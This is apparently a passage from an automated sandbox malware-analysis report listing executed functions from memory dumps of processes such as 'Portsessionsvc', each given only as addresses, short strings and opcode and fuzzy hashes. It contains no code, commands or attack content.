                                                              Memory Dump Source
                                                              • Source File: 00000026.00000002.2179109550.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_38_2_7ffd9b760000_iEIWJugOSvvEyboGDFYpQ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: afeb4298dac98fdff4fb6caaf071b3a459c5ef4a6435f4854e55e839c8882659
                                                              • Instruction ID: 78ac5625fa643a92ff6e59a2daafa44c14ba8fc2f8b15b830db769ea0a7f4bcc
                                                              • Opcode Fuzzy Hash: afeb4298dac98fdff4fb6caaf071b3a459c5ef4a6435f4854e55e839c8882659
                                                              • Instruction Fuzzy Hash: 3251EC0FB9C5274DE31932FD71619FC6B469FA0279B0846B7F15EC90DB8E0824868AE5

                                                              Executed Functions

                                                              Function 00007FFD9B7B1175 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: ef43dfc82cbda42a0e756be8066e923129a7f0a09312235f6450502ede2e49f2
                                                              • Instruction ID: 2bebe4a4d9452d83e9037d4fe27fec3cea4d97e7c31bea2610989a904268d28f
                                                              • Opcode Fuzzy Hash: ef43dfc82cbda42a0e756be8066e923129a7f0a09312235f6450502ede2e49f2
                                                              • Instruction Fuzzy Hash: 05819F61F7E36A0BE33C49684CA20717795EBD2205B1A837DD8DBC35A7DC18AD074A81
                                                              Function 00007FFD9B780D48 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5Y_H
                                                              • API String ID: 0-3237497481
                                                              • Opcode ID: 4b1273506420d54f0bab2deae7ab7aba2ffc768b0b7931c5315ed8e35095415f
                                                              • Instruction ID: c5fd33d3b902da30a0b26730c19f59d7557e88399c0db633321926ae7aa1b72e
                                                              • Opcode Fuzzy Hash: 4b1273506420d54f0bab2deae7ab7aba2ffc768b0b7931c5315ed8e35095415f
                                                              • Instruction Fuzzy Hash: E0910679A19A8D8FD75ADF6888657A97FE2FF96310F0002BBD059CB2E6DA7814108740
                                                              Function 00007FFD9B7B1141 Relevance: .5, Instructions: 459COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29cacb3b5b67865558ac7b34bfa591033d529cbeefb616bfd19787fb20a5794e
                                                              • Instruction ID: 1ac84d5d1ab1e5084b00bba8662e458c6d94a95be2a402ce98222ce3753f7f79
                                                              • Opcode Fuzzy Hash: 29cacb3b5b67865558ac7b34bfa591033d529cbeefb616bfd19787fb20a5794e
                                                              • Instruction Fuzzy Hash: A9C1B321B3E7AE0FE32D4A684C910B57791EF92305B1987BDD4DBC35B7D828A9074A81
                                                              Function 00007FFD9B780C25 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 277200e26e409dae68cdc82f55e0a1f068c4e42409205f337b3da2c35845ed17
                                                              • Instruction ID: 8a0abbc85fd62016e1e7d7a194364c0183c22cdbff141ad08c6d697179f6b4a2
                                                              • Opcode Fuzzy Hash: 277200e26e409dae68cdc82f55e0a1f068c4e42409205f337b3da2c35845ed17
                                                              • Instruction Fuzzy Hash: FC21D126A0DB8D8FE7129B6488611E87BA0EF42325F0542F7C0548B1E2D638260ACB91
                                                              Function 00007FFD9B78108D Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: V
                                                              • API String ID: 0-1342839628
                                                              • Opcode ID: bd14c7fcd610f283babf8e7716e9caa264d1262797df2f4a0d8396e1eacd0356
                                                              • Instruction ID: 3026771c788aa7c4a75b49faa5e801db89329505a4a8d4fe36ef1d3d419d7a37
                                                              • Opcode Fuzzy Hash: bd14c7fcd610f283babf8e7716e9caa264d1262797df2f4a0d8396e1eacd0356
                                                              • Instruction Fuzzy Hash: 1901F92498E6C60FD71A57B05CB1AF13F95DF87211B0902FAD099CB5F3C85D58468361
                                                              Function 00007FFD9B780C38 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 520a81ca70cafffcc94859bf87e1673d9ed667531c068c5f64aed3fa6216f359
                                                              • Instruction ID: 90b8e4a0e07ed3ca5dac72c8e3e345520d6ed687c8cccce9a03c48bd16e0b895
                                                              • Opcode Fuzzy Hash: 520a81ca70cafffcc94859bf87e1673d9ed667531c068c5f64aed3fa6216f359
                                                              • Instruction Fuzzy Hash: BD11A025A0DB8D8FE702DB74C8602E87FA0EF42315F0646F7C084DB1E2DA3826098B91
                                                              Function 00007FFD9B780C40 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 61635438aed1f1c3a4a9c9fc20a10f855f5c4fae1573f7791d906154e79172b6
                                                              • Instruction ID: ab1fd3a35968fd68e9ccafc6205c14f021a5478a70445569ac0c8c460d8a6ed9
                                                              • Opcode Fuzzy Hash: 61635438aed1f1c3a4a9c9fc20a10f855f5c4fae1573f7791d906154e79172b6
                                                              • Instruction Fuzzy Hash: F801A135A09B8D8FE702DB74C8606D97FB0AF02315F0546F7C480DB1A6D6382648CB91
                                                              Function 00007FFD9B780C48 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: d29e90e0689a99c8b78eedfe00202515bca0e764302219d4e39f5f2cf586c990
                                                              • Instruction ID: b0dceba582e9f25a0a82454677c46eeea92f871f24e0866e82e13419813222a9
                                                              • Opcode Fuzzy Hash: d29e90e0689a99c8b78eedfe00202515bca0e764302219d4e39f5f2cf586c990
                                                              • Instruction Fuzzy Hash: 7E01B135A0D7898FD702DB74C8506DD7FB0AF02315F0541E7D480DB2A6D6386648CB91
                                                              Function 00007FFD9B780C50 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: bd8b6f51305df0b5143f89dee9c9b3da75dc93b31064bdf85609f089ae850942
                                                              • Instruction ID: f14c0fed0f9c0cd8875da9d223a1fdad7a7907e0214d60845dae78e53bd7e652
                                                              • Opcode Fuzzy Hash: bd8b6f51305df0b5143f89dee9c9b3da75dc93b31064bdf85609f089ae850942
                                                              • Instruction Fuzzy Hash: 1C01A234A0D7898FD702DB74C8A46DD7FF0AF02315F1542E7D480CB2A6DA386648C741
                                                              Function 00007FFD9B7B2FB9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 7acb123cf6e54beec420f03a74cc6ba43d72fffee62007052a022077cf2e4a12
                                                              • Instruction ID: dad6f3d2b9dccbbe685951510d99dd1b2bd225ac6b41aaa7595cc7f936403fdf
                                                              • Opcode Fuzzy Hash: 7acb123cf6e54beec420f03a74cc6ba43d72fffee62007052a022077cf2e4a12
                                                              • Instruction Fuzzy Hash: 81E06D7160F7C48FC71AAA748869454BFA0EF6720174A46EFC046CF1B7EA2D8889CB01
                                                              Function 00007FFD9B793BB9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 4b43fc766ac1cd47a7da591cdf80477d690c9e3bc536900a59177af1b2b0693d
                                                              • Instruction ID: cfa55ed89338e8b9ba427b16bcc6a08c53cf1c6d28a8ff4a5c034aa663618a89
                                                              • Opcode Fuzzy Hash: 4b43fc766ac1cd47a7da591cdf80477d690c9e3bc536900a59177af1b2b0693d
                                                              • Instruction Fuzzy Hash: 41E06D2060E3C44FCB16AB7488684547F60EE6720174A42EFC086CF1A3EA2D8889C701
                                                              Function 00007FFD9B7BAB99 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: b47d6fe14c3174b3de2058bfa9f0386428db43f706162ab59f77e405e4e76ca9
                                                              • Instruction ID: b9871df1220c5717cfbd0dce8416a73a09bf9cdd13b41f769dc6ad9c0c2ad4dd
                                                              • Opcode Fuzzy Hash: b47d6fe14c3174b3de2058bfa9f0386428db43f706162ab59f77e405e4e76ca9
                                                              • Instruction Fuzzy Hash: A3E0ED6154F3D44FCB16AB7488698453F60EE6B21174B41DEC155CB1B3EA199949C701
                                                              Function 00007FFD9B7B1DD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 4119c5da3a654fef30a86e11c17fa1e5eee9ce641b23e5be0e6f8b4f66b92db0
                                                              • Instruction ID: be9d14774810aa6bccb53f8b8f2aef84cbd445e0a43f8931e159da244751b328
                                                              • Opcode Fuzzy Hash: 4119c5da3a654fef30a86e11c17fa1e5eee9ce641b23e5be0e6f8b4f66b92db0
                                                              • Instruction Fuzzy Hash: ECE01A6054A3C04FCB0AEB7484698447F70AE6B21078B41DEC049CB1B3D62D8949C701
                                                              Function 00007FFD9B7B7089 Relevance: .5, Instructions: 497COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ed64fdacf08f74c8592f7fef5291d390cdc6b6e94625fd705722f9dbaa726376
                                                              • Instruction ID: d16d2e5bbb9b67f4d915358dbbb273fa7cf09ff5adf4940e8c8ac827d54a4f6c
                                                              • Opcode Fuzzy Hash: ed64fdacf08f74c8592f7fef5291d390cdc6b6e94625fd705722f9dbaa726376
                                                              • Instruction Fuzzy Hash: 35024A31A0D7995FE7259B68C8616A53BE1EF82310F0502FED44D8B1F3DA28AD46CF91
                                                              Function 00007FFD9B7B344D Relevance: .3, Instructions: 292COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5fa97bcecd3805d497f5ba91717ccf9ed5bf5362d7cbdb764ec8eaad864b2c99
                                                              • Instruction ID: 7540bf5599a75e590c7f6418d7ba4e6120f12c2b9df8ac544eafa1fd9a7f1d48
                                                              • Opcode Fuzzy Hash: 5fa97bcecd3805d497f5ba91717ccf9ed5bf5362d7cbdb764ec8eaad864b2c99
                                                              • Instruction Fuzzy Hash: A6911861B1DA5D0FEB9CEA68887667573C2EF94300F01427AD41EC72E7DD287D418B90
                                                              Function 00007FFD9B7B2411 Relevance: .2, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 961e938c65e722cad6551ee561f842ea204d58d5e9a883c84232d5ac61bbfc9c
                                                              • Instruction ID: 859fa50e84969ae94a299a4bdcfd6881e3c335dd8f7e4f20e893bdcf9adbfe8b
                                                              • Opcode Fuzzy Hash: 961e938c65e722cad6551ee561f842ea204d58d5e9a883c84232d5ac61bbfc9c
                                                              • Instruction Fuzzy Hash: 7551E771B0D65D4FDB69EA58D8A4AA877D2FB94310F0503BAD00DD72E2CE286D458F81
                                                              Function 00007FFD9B780945 Relevance: .2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf94055f25c89cbf22be56ef6fb2a07fff3509c97e40e5239a55bba00ad853bf
                                                              • Instruction ID: e5cb615937688ad0b9fcfbfe5a384d5356d8417bfd627d28e2c45eeb832c2d6f
                                                              • Opcode Fuzzy Hash: cf94055f25c89cbf22be56ef6fb2a07fff3509c97e40e5239a55bba00ad853bf
                                                              • Instruction Fuzzy Hash: E341033270D9184FE728EAACF89A9F973D0EF4532170501BBE48AC7167DE11AC8287C5
                                                              Function 00007FFD9B780960 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b08e563b93b7d88a93d6a2f82c9a8b0860c59629edc753c37ba5d7318df7edf
                                                              • Instruction ID: 345da33870144f34229f7205c736a848e4e56c9594eb0a8f629e4271c6fc6a92
                                                              • Opcode Fuzzy Hash: 1b08e563b93b7d88a93d6a2f82c9a8b0860c59629edc753c37ba5d7318df7edf
                                                              • Instruction Fuzzy Hash: 8431DB26B5DA1D0FE759B66C64A6AF877C3DF98321F1401BAE40EC72F7DD289C414284
                                                              Function 00007FFD9B780998 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a2a37cedb0a8370d6113cbee9edff9f20ac644771a7dbb292a06aa3337dd64d
                                                              • Instruction ID: c4a68984e5e903ea5fd3508d210fc76ecc1dbb45820aee2cc764156d2cd85382
                                                              • Opcode Fuzzy Hash: 3a2a37cedb0a8370d6113cbee9edff9f20ac644771a7dbb292a06aa3337dd64d
                                                              • Instruction Fuzzy Hash: 6521D720B19E1D0FE799F66C54EA67576C7EB98312F5102B9E40EC33F6DD289D418281
                                                              Function 00007FFD9B7B6FE8 Relevance: .1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction ID: 905fe853454272e25f0d5d5a0c418f9fdb33f45c25f3cc13fe0950c524b69a0f
                                                              • Opcode Fuzzy Hash: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction Fuzzy Hash: 2B112E2BF4C2610EE319B7BDB4764FD3790DF5113970842B7E19DC91E3ED19644A8A84
                                                              Function 00007FFD9B786CAB Relevance: .1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 716efb65d6882ba69caa4851424989e3e51d3638175aeb979f3d3fb83383211b
                                                              • Instruction ID: f8c41129e048d17c6bb8f5f894d299be776bcb8fdd9594b497cec92e0d6c6772
                                                              • Opcode Fuzzy Hash: 716efb65d6882ba69caa4851424989e3e51d3638175aeb979f3d3fb83383211b
                                                              • Instruction Fuzzy Hash: 72212E35E19E1E9FDBB5DB48C4A07E973E1FB68311F1102BAD40DD32B1DA75AA408B80
                                                              Function 00007FFD9B7941BB Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 97c256b075b245c299a5f0640507588961d4628843b34287ac0def636494cd92
                                                              • Instruction ID: c41b268e9f08711f9583ba3eb797559343ce06e62f893fec586c51a37b2c3096
                                                              • Opcode Fuzzy Hash: 97c256b075b245c299a5f0640507588961d4628843b34287ac0def636494cd92
                                                              • Instruction Fuzzy Hash: 02119D71E1861E8BEB24DF88D8686BD77B2FF44314F51033AD41A9B2A5DF782A018780
                                                              Function 00007FFD9B7BD675 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 521cc07dbf3157807e3d80e16a8ee13574f13ac2b81ee4434033dc9dfb24cbb7
                                                              • Instruction ID: 9747b29f48b292d440c1bc83909053c5398ba649c5fea396a797f3f6db591f60
                                                              • Opcode Fuzzy Hash: 521cc07dbf3157807e3d80e16a8ee13574f13ac2b81ee4434033dc9dfb24cbb7
                                                              • Instruction Fuzzy Hash: D9019E31B0562E4BFB68869894657F977E1EB84344F050239D40ED61E1DA28AE508F80
                                                              Function 00007FFD9B7BB23D Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a98220b577bb3bb3852e38c7301a2c15139b3a4a2feb9e7aa0155ef761bae5ad
                                                              • Instruction ID: ffd4cd633879eb1cfa2be7cb66e50c5a217b67b394ad1bef19d0f52425afb066
                                                              • Opcode Fuzzy Hash: a98220b577bb3bb3852e38c7301a2c15139b3a4a2feb9e7aa0155ef761bae5ad
                                                              • Instruction Fuzzy Hash: 68F06D31B09A1E4EEB95EA9C54A67F877D1EF98312F440276E41CC72A2CE2869854B81
                                                              Function 00007FFD9B784CD0 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction ID: da51c9fa52b7cef639a1733a7d3759ea6381a400f3ef9667fa2d7d180bcb1368
                                                              • Opcode Fuzzy Hash: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction Fuzzy Hash: BE011E60E19F1D4EE7B5A65888B47B971D1AF48702F4202B9E45EE32B2DF786E404600
                                                              Function 00007FFD9B7B7A3D Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction ID: 71756f43975670f075d0df9702dd65893daffc051f65922f9c9bda5bb278888f
                                                              • Opcode Fuzzy Hash: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction Fuzzy Hash: FEF06922A0E7C55FD31A073888754687F71AE6722530B01E7C095CF0F3D9299D8AC762
                                                              Function 00007FFD9B784D19 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction ID: 01faf4bb102ef15a40fe28a017c915bb05845bdf3bd224aa624573ac65a7f278
                                                              • Opcode Fuzzy Hash: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction Fuzzy Hash: 2E011230A19B1E8EEB38EA54D8A47F532A1FF54702F1111BDD40ED31B2EA7C2B818A00
                                                              Function 00007FFD9B784DA0 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: 4b6a06b41acc23438f7dcebd3c21f45e4ab54e5599ee749a45f6da057d38525a
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: E9F03630709B1D4AE674EB44E8B4AB53391AF54701F1212B9D90ED71F3EE7C6B454504
                                                              Function 00007FFD9B7BAB09 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction ID: e84fcae9ad6c2e70ddba8a3231400df3fdd00eb8499688afd1799b603f63d25c
                                                              • Opcode Fuzzy Hash: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction Fuzzy Hash: B2F0E530B587880FC7199A2958654617BF1DF5B20534A42FFD49ACB2A3DD28AC458741
